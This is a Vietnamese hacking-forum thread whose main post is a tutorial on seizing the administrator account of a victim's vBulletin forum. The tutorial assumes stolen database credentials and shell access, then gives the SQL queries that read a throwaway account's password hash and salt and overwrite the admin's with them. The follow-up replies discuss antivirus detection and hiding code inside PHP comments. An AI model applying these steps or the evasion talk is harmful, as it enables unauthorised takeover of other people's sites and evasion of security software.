Tut hướng dẫn chiếm quyền admin vbb trong data

[Admin]

Tut này cho anh em học hỏi có rất nhiều trường hợp cần linh động.
Ở đây mình sẽ hướng dẫn 3 cách cơ bản để chiếm quyền admin
cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:

$config['Database']['dbname'] = 'forum'; $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '123456';

Hiểu biết sơ về câu lệnh SQL
Đầu tiên là các dạng mã hóa của một vài forum thông dụng hiện nay như:

1. phpBB : md5($pass) //ko dùng salt 2. VBB : md5(md5($pass).$salt) 3. IPB : md5(md5($salt).md5($pass))

Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :

Select * from user

Với lệnh trên thì ta có thể xem được tất cả user trên forum
Nếu forum victim có số lượng thành viện cỡ hơn 3000 thì ta dung lệnh :

Select password , salt from user where username='hacker'

Ta được

Pass md5 : 5cc70df698ca01c3adb396a08b4873ad Salt: ?`Y

Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.
Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong forum victim có nhiều admin ma ta ko biết admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A: Vào file config.php và tìm các dòng sau

$config['SpecialUsers']['canviewadminlog'] $config['SpecialUsers']['canpruneadminlog'] $config['SpecialUsers']['superadministrators']

Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thường thì mặc đinh định là userid=1 là rootadmin)
Ta tiếp tục dùng lệnh

Select password , salt from user where userid=1

Lấy được pass md5 & salt
Vi dụ:

Pass md5 : eaf1672523371b7736282bbfc2c8b2ac Salt : 2/D

Tiếp ta dùng lệnh
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google

Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin”

Câu lệnh hoàn chỉnh như sau:

Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1”

5cc70df698ca01c3adb396a08b4873ad

là pass md5 của nick hacker

?`Y

là salt của nick hacker
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào forum victim đăng nhập bằng nick admin với password là 123456

 

[congtust24]

Bị kaspersky anti ùi nè
Screenshot Uploader



----------> Bổ sung bài viết lúc 17:12 <----------> Bài viết trước lúc 17:11 <----------

 

[Admin]

Chẳng có tut hack nào mà ko có virus cả

 

[congtust24]

Phải có cách ẩn đi ý.
Cho nó vào // trong php hihi.
Mà sao bbcode

mình k xài được vậy?

 

[Admin]

Bt mà................